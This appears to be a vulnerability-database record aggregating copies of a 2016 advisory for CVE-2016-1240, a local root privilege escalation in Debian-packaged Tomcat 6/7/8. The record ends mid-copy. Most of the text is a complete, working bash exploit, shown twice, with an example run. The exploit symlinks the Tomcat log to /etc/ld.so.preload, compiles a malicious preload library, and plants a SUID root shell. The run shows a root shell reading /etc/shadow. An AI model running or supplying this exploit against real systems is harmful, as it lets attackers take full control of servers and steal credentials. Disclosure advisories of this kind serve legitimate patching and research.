exploitation.\"\r\ncleanexit 0\r\n}\r\n\r\n#intro\r\necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\"\r\necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\"\r\n\r\n# Args\r\nif [ $# -lt 1 ]; then\r\necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\"\r\nexit 3\r\nfi\r\nif [ \"$2\" = \"-deferred\" ]; then\r\nmode=\"deferred\"\r\nelse\r\nmode=\"active\"\r\nfi\r\n\r\n# Priv check\r\necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\"\r\nid | grep -q tomcat\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\"\r\nexit 3\r\nfi\r\n\r\n# Set target paths\r\nTOMCATLOG=\"$1\"\r\nif [ ! -f $TOMCATLOG ]; then\r\necho -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\"\r\nexit 3\r\nfi\r\necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\"\r\n\r\n# [ Deferred exploitation ]\r\n\r\n# Symlink the log file to /etc/default/locale file which gets executed daily on default\r\n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.\r\n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been\r\n# restarted and file owner gets changed.\r\nif [ \"$mode\" = \"deferred\" ]; then\r\nrm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\ncleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\necho -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\"\r\necho -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"\r\necho -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\"\r\necho -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\"\r\nexit 0\r\nfi\r\n\r\n# [ Active exploitation ]\r\n\r\ntrap ctrl_c INT\r\n# Compile privesc preload library\r\necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\"\r\ncat <<_solibeof_>$PRIVESCSRC\r\n#define _GNU_SOURCE\r\n#include <stdio.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <dlfcn.h>\r\nuid_t geteuid(void) {\r\nstatic uid_t (*old_geteuid)();\r\nold_geteuid = dlsym(RTLD_NEXT, \"geteuid\");\r\nif ( old_geteuid() == 0 ) {\r\nchown(\"$BACKDOORPATH\", 0, 0);\r\nchmod(\"$BACKDOORPATH\", 04777);\r\nunlink(\"/etc/ld.so.preload\");\r\n}\r\nreturn old_geteuid();\r\n}\r\n_solibeof_\r\ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\"\r\ncleanexit 2;\r\nfi\r\n\r\n# Prepare backdoor shell\r\ncp $BACKDOORSH $BACKDOORPATH\r\necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\"\r\n\r\n# Safety check\r\nif [ -f /etc/ld.so.preload ]; then\r\necho -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\"\r\ncleanexit 2\r\nfi\r\n\r\n# Symlink the log file to ld.so.preload\r\nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG\r\nif [ $? -ne 0 ]; then\r\necho -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"\r\ncleanexit 3\r\nfi\r\necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\"\r\n\r\n# Wait for Tomcat to re-open the logs\r\necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"\r\necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"\r\nwhile :; do\r\nsleep 0.1\r\nif [ -f /etc/ld.so.preload ]; then\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\nbreak;\r\nfi\r\ndone\r\n\r\n# /etc/ld.so.preload file should be owned by tomcat user at this point\r\n# Inject the privesc.so shared library to escalate privileges\r\necho $PRIVESCLIB > /etc/ld.so.preload\r\necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\"\r\necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"\r\necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\"\r\n\r\n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)\r\necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"\r\nsudo --help 2>/dev/null >/dev/null\r\n\r\n# Check for the rootshell\r\nls -l $BACKDOORPATH | grep rws | grep -q root\r\nif [ $? -eq 0 ]; then\r\necho -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\"\r\necho -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"\r\nelse\r\necho -e \"\\n[!] Failed to get root\"\r\ncleanexit 2\r\nfi\r\n\r\n# Execute the rootshell\r\necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! \\n\"\r\n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"\r\n$BACKDOORPATH -p\r\n\r\n# Job done.\r\ncleanexit 0\r\n\r\n--------------[ EOF ]--------------------\r\n\r\n\r\n\r\nExample exploit run:\r\n~~~~~~~~~~~~~~\r\n\r\n[email\u00a0protected]:/tmp$ id\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[email\u00a0protected]:/tmp$ lsb_release -a\r\nNo LSB modules are available.\r\nDistributor ID: Ubuntu\r\nDescription: Ubuntu 16.04 LTS\r\nRelease: 16.04\r\nCodename: xenial\r\n\r\n[email\u00a0protected]:/tmp$ dpkg -l | grep tomcat\r\nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries\r\nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine\r\nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files\r\n\r\n[email\u00a0protected]:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out\r\n\r\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\r\nCVE-2016-1240\r\n\r\nDiscovered and coded by:\r\n\r\nDawid Golunski\r\nhttp://legalhackers.com\r\n\r\n[+] Starting the exploit in [active] mode with the following privileges:\r\nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)\r\n\r\n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out\r\n\r\n[+] Compiling the privesc shared library (/tmp/privesclib.c)\r\n\r\n[+] Backdoor/low-priv shell installed at:\r\n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\n[+] Symlink created at:\r\nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload\r\n\r\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\r\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\r\n\r\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:\r\n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload\r\n\r\n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload\r\n\r\n[+] The /etc/ld.so.preload file now contains:\r\n/tmp/privesclib.so\r\n\r\n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!\r\n\r\n[+] Rootshell got assigned root SUID perms at:\r\n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh\r\n\r\nPlease tell me you're seeing this too ;)\r\n\r\n[+] Executing the rootshell /tmp/tomcatrootsh now!\r\n\r\ntomcatrootsh-4.3# id\r\nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)\r\ntomcatrootsh-4.3# whoami\r\nroot\r\ntomcatrootsh-4.3# head -n3 /etc/shadow\r\nroot:$6$oaf[cut]:16912:0:99999:7:::\r\ndaemon:*:16912:0:99999:7:::\r\nbin:*:16912:0:99999:7:::\r\ntomcatrootsh-4.3# exit\r\nexit\r\n\r\n[+] Cleaning up...\r\n\r\n[+] Job done. Exiting with code 0\r\n\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nLocal attackers who have gained access to tomcat user account (for example\r\nremotely via a vulnerable web application, or locally via weak webroot perms),\r\ncould escalate their privileges to root and fully compromise the affected system.\r\n\r\n\r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nThe following Debian package versions are affected:\r\n\r\nTomcat 8 <= 8.0.36-2\r\nTomcat 7 <= 7.0.70-2\r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nA more detailed lists of affected packages can be found at:\r\n\r\nDebian:\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\nUbuntu:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nOther systmes that use Tomcat packages provided by Debian may also be affected.\r\n\r\n\r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nDebian Security Team was contacted and has fixed affected upstream packages.\r\nUpdate to the latest tomcat packages provided by your distribution.\r\n\r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html\r\n\r\nThe exploit's sourcecode\r\nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh\r\n\r\nCVE-2016-1240\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240\r\n\r\nUbuntu Security Notice USN-3081-1:\r\nhttp://www.ubuntu.com/usn/usn-3081-1/\r\n\r\nDebian Security Advisory DSA-3669-1 (tomcat7):\r\nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html\r\nhttps://www.debian.org/security/2016/dsa-3669\r\n\r\nDebian Security Advisory DSA-3670-1 (tomcat8):\r\nhttps://www.debian.org/security/2016/dsa-3670\r\n\r\nhttps://security-tracker.debian.org/tracker/CVE-2016-1240\r\n\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nhttp://legalhackers.com\r\n\r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n30.09.2016 - Advisory released\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25101"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:19", "bulletinFamily": "exploit", "description": "", "modified": "2016-10-02T00:00:00", "published": "2016-10-02T00:00:00", "href": "https://packetstormsecurity.com/files/138940/Apache-Tomcat-8.0.36-2-Privilege-Escalation.html", "id": "PACKETSTORM:138940", "title": "Apache Tomcat 8.0.36-2 Privilege Escalation", "type": "packetstorm", "sourceData": "`============================================= \n- Discovered by: Dawid Golunski \n- http://legalhackers.com \n- dawid (at) legalhackers.com \n \n- CVE-2016-1240 \n- Release date: 30.09.2016 \n- Revision: 1 \n- Severity: High \n============================================= \n \n \nI. VULNERABILITY \n------------------------- \n \nApache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation \n \nAffected debian packages: \n \nTomcat 8 <= 8.0.36-2 \nTomcat 7 <= 7.0.70-2 \nTomcat 6 <= 6.0.45+dfsg-1~deb8u1 \n \nUbuntu systems are also affected. See section VII. for details. \nOther systems using the affected debian packages may also be affected. \n \n \nII. BACKGROUND \n------------------------- \n \n\"The Apache TomcatAA(r) software is an open source implementation of the \nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language \nand Java WebSocket specifications are developed under the Java Community \nProcess. \n \nThe Apache Tomcat software is developed in an open and participatory \nenvironment and released under the Apache License version 2. \nThe Apache Tomcat project is intended to be a collaboration of the \nbest-of-breed developers from around the world. \n \nApache Tomcat software powers numerous large-scale, mission-critical web \napplications across a diverse range of industries and organizations. \nSome of these users and their stories are listed on the PoweredBy wiki page. \n\" \n \nhttp://tomcat.apache.org/ \n \n \nIII. INTRODUCTION \n------------------------- \n \nTomcat (6, 7, 8) packages provided by default repositories on Debian-based \ndistributions (including Debian, Ubuntu etc.) provide a vulnerable \ntomcat init script that allows local attackers who have already gained access \nto the tomcat account (for example, by exploiting an RCE vulnerability \nin a java web application hosted on Tomcat, uploading a webshell etc.) to \nescalate their privileges from tomcat user to root and fully compromise the \ntarget system. \n \nIV. DESCRIPTION \n------------------------- \n \nThe vulnerability is located in the tomcat init script provided by affected \npackages, normally installed at /etc/init.d/tomcatN. \n \nThe script for tomcat7 contains the following lines: \n \n-----[tomcat7]---- \n \n# Run the catalina.sh script as a daemon \nset +e \ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out \nchown $TOMCAT7_USER \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out \n \n-------[eof]------ \n \nLocal attackers who have gained access to the server in the context of the \ntomcat user (for example, through a vulnerability in a web application) would \nbe able to replace the log file with a symlink to an arbitrary system file \nand escalate their privileges to root once Tomcat init script (running as root) \nre-opens the catalina.out file after a service restart, reboot etc. \n \nAs attackers would already have a tomcat account at the time of exploitation, \nthey could also kill the tomcat processes to introduce the need for a restart. \n \n \nV. PROOF OF CONCEPT EXPLOIT \n------------------------- \n \n------[ tomcat-rootprivesc-deb.sh ]------ \n \n#!/bin/bash \n# \n# Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit \n# \n# CVE-2016-1240 \n# \n# Discovered and coded by: \n# \n# Dawid Golunski \n# http://legalhackers.com \n# \n# This exploit targets Tomcat (versions 6, 7 and 8) packaging on \n# Debian-based distros including Debian, Ubuntu etc. \n# It allows attackers with a tomcat shell (e.g. obtained remotely through a \n# vulnerable java webapp, or locally via weak permissions on webapps in the \n# Tomcat webroot directories etc.) to escalate their privileges to root. \n# \n# Usage: \n# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] \n# \n# The exploit can used in two ways: \n# \n# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly \n# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted. \n# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up \n# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.) \n# \n# -deferred (requires the -deferred switch on argv[2]) - this mode symlinks the logfile to \n# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting. \n# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a \n# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can \n# then add arbitrary commands to the file which will be executed with root privileges by \n# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around 6:25am on default \n# Ubuntu/Debian Tomcat installations). \n# \n# See full advisory for details at: \n# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html \n# \n# Disclaimer: \n# For testing purposes only. Do no harm. \n# \n \nBACKDOORSH=\"/bin/bash\" \nBACKDOORPATH=\"/tmp/tomcatrootsh\" \nPRIVESCLIB=\"/tmp/privesclib.so\" \nPRIVESCSRC=\"/tmp/privesclib.c\" \nSUIDBIN=\"/usr/bin/sudo\" \n \nfunction cleanexit { \n# Cleanup \necho -e \"\\n[+] Cleaning up...\" \nrm -f $PRIVESCSRC \nrm -f $PRIVESCLIB \nrm -f $TOMCATLOG \ntouch $TOMCATLOG \nif [ -f /etc/ld.so.preload ]; then \necho -n > /etc/ld.so.preload 2>/dev/null \nfi \necho -e \"\\n[+] Job done. Exiting with code $1 \\n\" \nexit $1 \n} \n \nfunction ctrl_c() { \necho -e \"\\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation.\" \ncleanexit 0 \n} \n \n#intro \necho -e \"\\033[94m \\nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\\nCVE-2016-1240\\n\" \necho -e \"Discovered and coded by: \\n\\nDawid Golunski \\nhttp://legalhackers.com \\033[0m\" \n \n# Args \nif [ $# -lt 1 ]; then \necho -e \"\\n[!] Exploit usage: \\n\\n$0 path_to_catalina.out [-deferred]\\n\" \nexit 3 \nfi \nif [ \"$2\" = \"-deferred\" ]; then \nmode=\"deferred\" \nelse \nmode=\"active\" \nfi \n \n# Priv check \necho -e \"\\n[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \\n`id`\" \nid | grep -q tomcat \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] You need to execute the exploit as tomcat user! Exiting.\\n\" \nexit 3 \nfi \n \n# Set target paths \nTOMCATLOG=\"$1\" \nif [ ! -f $TOMCATLOG ]; then \necho -e \"\\n[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\\n\" \nexit 3 \nfi \necho -e \"\\n[+] Target Tomcat log file set to $TOMCATLOG\" \n \n# [ Deferred exploitation ] \n \n# Symlink the log file to /etc/default/locale file which gets executed daily on default \n# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am. \n# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been \n# restarted and file owner gets changed. \nif [ \"$mode\" = \"deferred\" ]; then \nrm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\" \ncleanexit 3 \nfi \necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\" \necho -e \"\\n[+] The current owner of the file is: \\n`ls -l /etc/default/locale`\" \necho -ne \"\\n[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\" \necho -ne \"\\n you'll be able to add arbitrary commands to the file which will get executed with root privileges\" \necho -ne \"\\n at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\\n\\n\" \nexit 0 \nfi \n \n# [ Active exploitation ] \n \ntrap ctrl_c INT \n# Compile privesc preload library \necho -e \"\\n[+] Compiling the privesc shared library ($PRIVESCSRC)\" \ncat <<_solibeof_>$PRIVESCSRC \n#define _GNU_SOURCE \n#include <stdio.h> \n#include <sys/stat.h> \n#include <unistd.h> \n#include <dlfcn.h> \nuid_t geteuid(void) { \nstatic uid_t (*old_geteuid)(); \nold_geteuid = dlsym(RTLD_NEXT, \"geteuid\"); \nif ( old_geteuid() == 0 ) { \nchown(\"$BACKDOORPATH\", 0, 0); \nchmod(\"$BACKDOORPATH\", 04777); \nunlink(\"/etc/ld.so.preload\"); \n} \nreturn old_geteuid(); \n} \n_solibeof_ \ngcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Failed to compile the privesc lib $PRIVESCSRC.\" \ncleanexit 2; \nfi \n \n# Prepare backdoor shell \ncp $BACKDOORSH $BACKDOORPATH \necho -e \"\\n[+] Backdoor/low-priv shell installed at: \\n`ls -l $BACKDOORPATH`\" \n \n# Safety check \nif [ -f /etc/ld.so.preload ]; then \necho -e \"\\n[!] /etc/ld.so.preload already exists. Exiting for safety.\" \ncleanexit 2 \nfi \n \n# Symlink the log file to ld.so.preload \nrm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG \nif [ $? -ne 0 ]; then \necho -e \"\\n[!] Couldn't remove the $TOMCATLOG file or create a symlink.\" \ncleanexit 3 \nfi \necho -e \"\\n[+] Symlink created at: \\n`ls -l $TOMCATLOG`\" \n \n# Wait for Tomcat to re-open the logs \necho -ne \"\\n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\" \necho -e \"\\nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\" \nwhile :; do \nsleep 0.1 \nif [ -f /etc/ld.so.preload ]; then \necho $PRIVESCLIB > /etc/ld.so.preload \nbreak; \nfi \ndone \n \n# /etc/ld.so.preload file should be owned by tomcat user at this point \n# Inject the privesc.so shared library to escalate privileges \necho $PRIVESCLIB > /etc/ld.so.preload \necho -e \"\\n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \\n`ls -l /etc/ld.so.preload`\" \necho -e \"\\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\" \necho -e \"\\n[+] The /etc/ld.so.preload file now contains: \\n`cat /etc/ld.so.preload`\" \n \n# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) \necho -e \"\\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\" \nsudo --help 2>/dev/null >/dev/null \n \n# Check for the rootshell \nls -l $BACKDOORPATH | grep rws | grep -q root \nif [ $? -eq 0 ]; then \necho -e \"\\n[+] Rootshell got assigned root SUID perms at: \\n`ls -l $BACKDOORPATH`\" \necho -e \"\\n\\033[94mPlease tell me you're seeing this too ;) \\033[0m\" \nelse \necho -e \"\\n[!] Failed to get root\" \ncleanexit 2 \nfi \n \n# Execute the rootshell \necho -e \"\\n[+] Executing the rootshell $BACKDOORPATH now! \\n\" \n$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\" \n$BACKDOORPATH -p \n \n# Job done. \ncleanexit 0 \n \n--------------[ EOF ]-------------------- \n \n \n \nExample exploit run: \n~~~~~~~~~~~~~ \n \ntomcat7@ubuntu:/tmp$ id \nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) \n \ntomcat7@ubuntu:/tmp$ lsb_release -a \nNo LSB modules are available. \nDistributor ID: Ubuntu \nDescription: Ubuntu 16.04 LTS \nRelease: 16.04 \nCodename: xenial \n \ntomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat \nii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries \nii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine \nii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files \n \ntomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out \n \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit \nCVE-2016-1240 \n \nDiscovered and coded by: \n \nDawid Golunski \nhttp://legalhackers.com \n \n[+] Starting the exploit in [active] mode with the following privileges: \nuid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7) \n \n[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out \n \n[+] Compiling the privesc shared library (/tmp/privesclib.c) \n \n[+] Backdoor/low-priv shell installed at: \n-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh \n \n[+] Symlink created at: \nlrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload \n \n[+] Waiting for Tomcat to re-open the logs/Tomcat service restart... \nYou could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;) \n \n[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \n-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload \n \n[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload \n \n[+] The /etc/ld.so.preload file now contains: \n/tmp/privesclib.so \n \n[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root! \n \n[+] Rootshell got assigned root SUID perms at: \n-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh \n \nPlease tell me you're seeing this too ;) \n \n[+] Executing the rootshell /tmp/tomcatrootsh now! \n \ntomcatrootsh-4.3# id \nuid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7) \ntomcatrootsh-4.3# whoami \nroot \ntomcatrootsh-4.3# head -n3 /etc/shadow \nroot:$6$oaf[cut]:16912:0:99999:7::: \ndaemon:*:16912:0:99999:7::: \nbin:*:16912:0:99999:7::: \ntomcatrootsh-4.3# exit \nexit \n \n[+] Cleaning up... \n \n[+] Job done. Exiting with code 0 \n \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nLocal attackers who have gained access to tomcat user account (for example \nremotely via a vulnerable web application, or locally via weak webroot perms), \ncould escalate their privileges to root and fully compromise the affected system. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nThe following Debian package versions are affected: \n \nTomcat 8 <= 8.0.36-2 \nTomcat 7 <= 7.0.70-2 \nTomcat 6 <= 6.0.45+dfsg-1~deb8u1 \n \nA more detailed lists of affected packages can be found at: \n \nDebian: \nhttps://security-tracker.debian.org/tracker/CVE-2016-1240 \n \nUbuntu: \nhttp://www.ubuntu.com/usn/usn-3081-1/ \n \nOther systmes that use Tomcat packages provided by Debian may also be affected. \n \n \nVIII. SOLUTION \n------------------------- \n \nDebian Security Team was contacted and has fixed affected upstream packages. \nUpdate to the latest tomcat packages provided by your distribution. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html \n \nThe exploit's sourcecode \nhttp://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh \n \nCVE-2016-1240 \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240 \n \nUbuntu Security Notice USN-3081-1: \nhttp://www.ubuntu.com/usn/usn-3081-1/ \n \nDebian Security Advisory DSA-3669-1 (tomcat7): \nhttps://lists.debian.org/debian-security-announce/2016/msg00249.html \nhttps://www.debian.org/security/2016/dsa-3669 \n \nDebian Security Advisory DSA-3670-1 (tomcat8): \nhttps://www.debian.org/security/2016/dsa-3670 \n \nhttps://security-tracker.debian.org/tracker/CVE-2016-1240 \n \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nhttp://legalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n30.09.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/138940/tomcat80362-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:03:53", "bulletinFamily": "exploit", "description": "I. VULNERABILITY\r\n-------------------------\r\n\r\nApache Tomcat\u00ae packaging on Debian-based distros - Local Root Privilege Escalation\r\n\r\nAffected debian packages:\r\n\r\nTomcat 8 <= 8.0.36-2 \r\nTomcat 7 <= 7.0.70-2 \r\nTomcat 6 <= 6.0.45+dfsg-1~deb8u1\r\n\r\nUbuntu systems are also affected. See section VII. for details.\r\nOther systems using the affected debian packages may also be affected.\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"The Apache Tomcat software is an open source implementation of the \r\nJava Servlet, JavaServer Pages, Java Expression Language and Java WebSocket \r\ntechnologies. The Java Servlet, JavaServer Pages, Java Expression Language \r\nand Java WebSocket specifications are developed under the Java Community \r\nProcess.\r\n\r\nThe Apache Tomcat software is developed in an open and participatory \r\nenvironment and released under the Apache License version 2. \r\nThe Apache Tomcat project is intended to be a collaboration of the \r\nbest-of-breed developers from around the world.\r\n\r\nApache Tomcat software powers numerous large-scale, mission-critical web \r\napplications across a diverse range of industries and organizations. \r\nSome of these users and their stories are listed on the PoweredBy wiki page.\r\n\"\r\n\r\nhttp://tomcat.apache.org/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nTomcat (6, 7, 8) packages provided by default repositories on Debian-based \r\ndistributions (including Debian, Ubuntu etc.) provide a vulnerable\r\ntomcat init script that allows local attackers who have already gained access \r\nto the tomcat account (for example, by exploiting an RCE vulnerability\r\nin a java web application hosted on Tomcat, uploading a webshell etc.) to\r\nescalate their privileges from tomcat user to root and fully compromise the \r\ntarget system.\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nThe vulnerability is located in the tomcat init script provided by affected\r\npackages, normally installed at /etc/init.d/tomcatN. \r\n\r\nThe script for tomcat7 contains the following lines:\r\n```\r\n-----[tomcat7]----\r\n\r\n# Run the catalina.sh script as a daemon\r\nset +e\r\ntouch \"$CATALINA_PID\" \"$CATALINA_BASE\"/logs/catalina.out\r\nchown $TOMCAT7_USER 